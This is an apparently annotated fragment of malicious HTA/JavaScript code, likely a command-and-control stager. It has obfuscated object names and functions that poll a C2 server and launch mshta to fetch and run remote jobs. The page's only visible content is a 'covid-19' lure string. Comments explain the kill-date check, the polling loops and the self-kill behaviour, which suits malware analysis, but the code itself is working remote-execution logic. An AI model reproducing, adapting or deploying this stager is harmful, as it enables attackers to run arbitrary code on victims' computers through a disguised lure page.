USZOOYWIZS.JLOOXOZDZT.FEQUSOEKAK(USZOOYWIZS.FSZGCSETMH.IAPTOFSEZA());try{USZOOYWIZS.JLOOXOZDZT.MMTQDJLVYX("");}catch(e){USZOOYWIZS.JLOOXOZDZT.ENNXSOYMMH(e)} | |
USZOOYWIZS.IQSPUIAMOB();} | |
else | |
{if(USZOOYWIZS.DYPJQVFPFC()) | |
CanHelpTimeout();else | |
CanHelpLoop();}} | |
catch(e) | |
{USZOOYWIZS.JLOOXOZDZT.ENNXSOYMMH(e);} | |
// CanHelp: one C2 poll. Kill-date check (never fires), empty POST; on
// 200/201/202 with a body, the body is the job key and `mshta <URL+key>` is
// spawned (202 => 32-bit). Returns 1 to continue, 0 to stop. No sleep.
function CanHelp() | |
{var epoch=new Date().getTime();var expire=parseInt(USZOOYWIZS.HIJJAGKENR);if(epoch>expire) | |
{return 0;} | |
try | |
{var work=USZOOYWIZS.JLOOXOZDZT.KEYOMPGODE();if(work.status==201||work.status==202||work.status==200) | |
{if(work.responseText.length>0){var jobkey=work.responseText;USZOOYWIZS.JLOOXOZDZT.MMTQDJLVYX(jobkey,work.status==202);}} | |
else | |
{return 0;}} | |
catch(e) | |
{return 0;} | |
return 1;} | |
// CanHelpLoop (wscript): poll continuously, then self-kill.
// CanHelpTimeout (HTA): at most 10 polls, then always respawn mshta with an
// empty job key and self-kill (`sn` is the literal "undefined", so the final
// guard is always true).
function CanHelpLoop() | |
{var an="undefined";while(CanHelp());USZOOYWIZS.IQSPUIAMOB();} | |
function CanHelpTimeout() | |
{var sn="undefined";for(var i=(1-1);i<(5*5-15);++i) | |
{if(!CanHelp()) | |
{USZOOYWIZS.IQSPUIAMOB();return;}} | |
if(sn=="undefined"){USZOOYWIZS.JLOOXOZDZT.MMTQDJLVYX("");USZOOYWIZS.IQSPUIAMOB();}} | |
</script> | |
</head> | |
<body> | |
<!-- Only visible content: a COVID-19 themed lure string. -->
covid-19 | |
</body> | |
</html> |